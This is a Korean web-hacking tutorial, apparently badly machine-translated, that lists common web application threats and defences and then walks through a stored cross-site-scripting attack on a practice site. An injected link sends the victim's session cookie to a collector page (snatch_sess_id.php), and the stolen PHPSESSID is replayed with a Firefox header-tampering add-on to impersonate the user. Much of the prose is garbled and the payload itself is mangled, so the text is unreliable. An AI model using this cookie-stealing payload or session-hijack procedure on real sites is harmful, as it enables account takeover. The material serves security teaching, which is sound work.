더 많은 사람들이 인터넷에 액세스할 수 있습니다. 이는 많은 조직을 개발하는 웹 기반 응용 프로그램의 사용자가 사용할 수 있습니다 온라인과 상호 작용하 조직입니다. 잘못 작성된 코드를 위한 웹 응용 프로그램에 악용될 수 있습을 얻을 민감한 데이터에 대한 무단 액세스하고 웹 서버에 있습니다.

이 튜토리얼에서 당신은 해킹하는 방법을 알아보십시오 웹사이트,그리고 우리는 당신을 소개하여 웹 응용 프로그램 해킹 기법과 카운터를 측정할 수 있습니어에 대하여 이러한 공격입니다.

이 튜토리얼에서 다루는 주제

• 웹 응용 프로그램이란 무엇입니까? 웹 위협이란 무엇입니까?
• 해킹으로부터 웹 사이트를 보호하는 방법은 무엇입니까?
• 웹 사이트 해킹 트릭:웹 사이트를 온라인으로 해킹하십시오!

웹 응용 프로그램이란 무엇입니까? 웹 위협이란 무엇입니까?

웹 응용 프로그램(일명 웹 사이트)은 클라이언트-서버 모델을 기반으로하는 응용 프로그램입니다. 서버는 데이터베이스 액세스 및 비즈니스 로직을 제공합니다. 웹 서버에서 호스팅됩니다. 클라이언트 응용 프로그램은 클라이언트 웹 브라우저에서 실행됩니다. 웹 응용 프로그램은 일반적으로 Java,C#및 같은 언어로 작성됩니다 VB.Net,PHP,ColdFusion 마크 업 언어 등 웹 응용 프로그램에 사용되는 데이터베이스 엔진에는 MySQL,MS SQL Server,PostgreSQL,SQLite 등이 있습니다.

대부분의 웹 응용 프로그램 호스에 공개 서버를 통해 액세스할 수 있다. 이것은 쉬운 접근성으로 인해 공격에 취약하게 만듭니다. 다음은 일반적인 웹 응용 프로그램 위협입니다.

• SQL Injection-이 위협의 목표는 로그인 알고리즘을 우회하고 데이터를 방해하는 것 등이 될 수 있습니다.
• 의 서비스 거부 공격의 목표는 이러한 위협이 될 수 있을 거부하는 합법적인 사용자 리소스에 액세스할
• 교차 사이트 스크립팅 XSS–의 목표는 이러한 위협이 될 수 있을 삽입하는 코드에서 실행 될 수 있다는 클라이언트 측의 브라우저입니다.
• 쿠키/세션 중독–의 목표는 이러한 위협은 수정하는 쿠키/세션 데이터를 공격자에 의해 무단 액세스.
• 양식을 변경–의 목표는 이러한 위협은 수정하는 형태로 데이터와 같은 가격에서 전자 상거래는 응용 프로그램 그래서 그는 공격을 얻을 수 있는 항목에서 감소한 가격입니다.
• 코드 주입-이 위협의 목표는 PHP,Python 등과 같은 코드를 주입하는 것입니다. 즉,서버에서 실행될 수있다. 이 코드는 백도어를 설치하고 민감한 정보를 공개 할 수 있습니다.
• 오손의 목표는 이러한 위협은 수정 페이지에 표시되는 웹사이트에와 리디렉션의 모든 페이지를 요청을 한 페이지가 포함된 공격자의 메시지입니다.

해킹으로부터 웹 사이트를 보호하는 방법은 무엇입니까?

조직은 웹 서버 공격으로부터 자신을 보호하기 위해 다음 정책을 채택 할 수 있습니다.

• SQL Injection–살균 및 유효성 검사 사용자 매개 변수를 제출하기 전에를 위한 데이터베이스를 처리할 수 있습의 기회를 줄이는 데 도움이 되었습 공격 통해 SQL Injection. MS SQL Server,MySQL 등과 같은 데이터베이스 엔진 지원 매개 변수 및 준비된 명령문. 그들은 그보다 훨씬 더 안전하는 전통적인 SQL 문
• 의 서비스 거부 공격과 방화벽 삭제하는 데 사용할 수 있습니다 트래픽에서 의심스러운 경우에 IP 주소를 공격하는 간단하다. 적절한 네트워크 구성 및 침입 탐지 시스템을 줄이는 데 도움이 될 수 있습니다 기회의 DoS 공격 성공적이었다.
• 크로스사이트스크립팅 여부–검증 및 살균 헤더를 매개 변수를 통해 전달되는 URL 을 형태로 변하고 숨겨진 값을 줄일 수 있습니다 XSS 공격입니다.
• 쿠키/세션 중독을–이 방지할 수 있습의 내용을 암호화하여,쿠키,타이밍으로 쿠키는 몇 시간 후,연결하는 쿠키는 클라이언트 IP 주소를 만드는 데 사용된다.
• 양식 템퍼링-이를 처리하기 전에 사용자 입력을 검증하고 검증함으로써 방지 할 수 있습니다.
• 코드 주입-이것은 모든 매개 변수를 실행 코드가 아닌 데이터로 처리함으로써 방지 할 수 있습니다. 이를 구현하기 위해 위생 처리 및 검증을 사용할 수 있습니다.
• 오손–은 좋은 웹 응용 프로그램 개발 보안 정책을 확인 해야 그것은 물개 일반적으로 사용되는 취약점를 웹 서버에 액세스할 수 있습니다. 이는 웹 응용 프로그램을 개발할 때 운영 체제,웹 서버 소프트웨어 및 최상의 보안 관행의 적절한 구성 일 수 있습니다.

웹사이트 트릭킹:해킹 웹 사이트 online

이 웹 사이트에서 해킹의 실제 시나리오를 납치하는 사용자 세션의 웹 응용 프로그램에 위치 www.techpanda.org. 우리는 크로스 사이트 스크립팅을 사용하여 쿠키 세션 id 를 읽은 다음 합법적 인 사용자 세션을 가장하는 데 사용합니다.

가 만들은 공격자에 액세스할 수 있 웹 응용 프로그램 및 그는 것처럼하지 않고 세션이 사용자가 다른 사용자의 사용하는 같은 응용 프로그램입니다. 의 목표는 이러한 공격이 될 수 있을 얻을 관리자에 액세스하여 웹 응용 프로그램을 가정하면 공격자의 계정에 액세스가 제한된다.

시작하기

• 열기http://www.techpanda.org/
• 연습 목적으로 SQL Injection 을 사용하여 액세스 권한을 얻는 것이 좋습니다. 그렇게하는 방법에 대한 자세한 내용은이 기사를 참조하십시오.
• 로그인 이메일은이 이메일 주소가 스팸봇으로부터 보호되고 있다는 것입니다. 당신은 그것을보기 위해 자바 스크립트를 활성화해야합니다. 암호가 Password2010
• 경우 로그인이 성공적으로, 당신은 다음과 같은 대시보드

• 새로 추가 버튼을 클릭하여 접촉
• 다음과 같이 입력한 첫 번째 이름

<a href=# onclick=\”문서입니다.위치=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape><>

.

위의 코드를 사용한 자바 스크립트. 그것은 onclick 이벤트와 하이퍼 링크를 추가합니다. 순진한 사용자가 링크를 클릭하면 이벤트가 PHP 쿠키 세션 ID 를 검색하여 snatch_sess_id 로 보냅니다.php 페이지와 함께 세션 id URL

• 입력한 정보는 아래와 같이
• 을 클릭하면 변경

• 대시보드에는 이제 모양과 같은 다음과 같은 화면

• 때문에 교차 사이트 스크립트 코드에 저장된 데이터베이스 그것이 로드됩니다 매번 사용자 액세스 권한 login
• 다고 가정해 봅시 관리자는 로그인 하이퍼링크를 클릭하면 말하는 어두운
• 그는 창 session id 에서 보여주는 URL

참고: 스크립트가 될 수 있습을 보내는 가치를 원격 서버 PHPSESSID 저장되어 다음의 사용자로 다시 이동하는 웹사이트에 아무것도 없다면 일이 일어났습니다.

참고: 값을 얻을 수 있습에서 다른 하나에는 이 웹 페이지 해킹을 자습서지만,그 개념은 이 같은

세션을 사용한 가장 파이어 폭스 및 탬퍼 데이터를 추가

아래 순서도 보여줍니다 수행해야 할 단계를 완료하는 이 운동입니다.

• 야 합니다 Firefox 웹 브라우저에 대한 이 섹션 및 탬퍼 데이터를 추가
• 파이어폭스 설치를 추가로 아래 그림에 표시된

• 검색에 대한 탬퍼 클릭 데이터에 설치 위 그림과 같이

• 클릭 에 동의 및 설치…

• 클릭에서 지금 다시 시작할 때의 설치가 완료된
• 설정 메뉴 모음에서는 파이어 폭스지 않은 경우 다음과 같

• 클릭 도구 메뉴를 선택한 다음 변경 데이터는 아래와 같이

• 당신은 다음과 같은 창을 얻을 것이다. 참고:는 경우 윈도우이 비어 있지 않은 지우기 버튼을 누르

• 시작을 클릭하 탬퍼 메뉴
• 로 다시 전환 Firefox 웹 브라우저 유형http://www.techpanda.org/대시보드.php enter 키를 누릅을 로드하는 페이지
• 을 얻을 것이 다음과 같은 팝업에서 데이터 변조

• 팝업 창에는 세 가지(3)옵션이 있습니다. 탬퍼 옵션을 사용하면 HTTP 헤더 정보를 서버에 제출하기 전에 수정할 수 있습니다.
• 그것을 클릭
• 을 얻을 것이 다음과 같은 창

• 사본을 PHP session ID 에서 복사한 공격 URL 을 붙여 후에는 동일한 표시입니다. 당신의 가치가 다음과 같이

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• 확인 버튼을 클릭하여
• 을 얻을 것이 변조 데이터가 팝업 창이 다시

• 확인란의 선택을 취소 요청하는 계속 변조?
• 제출 버튼을 클릭하면 수행
• 당신이 볼 수 있어야 대시보드는 아래와 같이

참고: 우리는 하지 않았 로그인이,우리는 가장된 로그인 세션을 사용하여 PHPSESSID 가치는 우리가 사용하여 검색 크로스사이트스크립팅 여부

요약

• 웹 응용 프로그램을 기반으로 서버-클라이언트는 모델입니다. 클라이언트 측은 웹 브라우저를 사용하여 서버의 리소스에 액세스합니다.
• 웹 응용 프로그램은 일반적으로 인터넷을 통해 액세스 할 수 있습니다. 이것은 공격에 취약하게 만듭니다.
• 웹 애플리케이션 위협에는 SQL 주입,코드 주입,XSS,오손,쿠키 중독 등이 포함됩니다.
• 웹 응용 프로그램을 개발할 때 좋은 보안 정책은 보안을 유지하는 데 도움이 될 수 있습니다.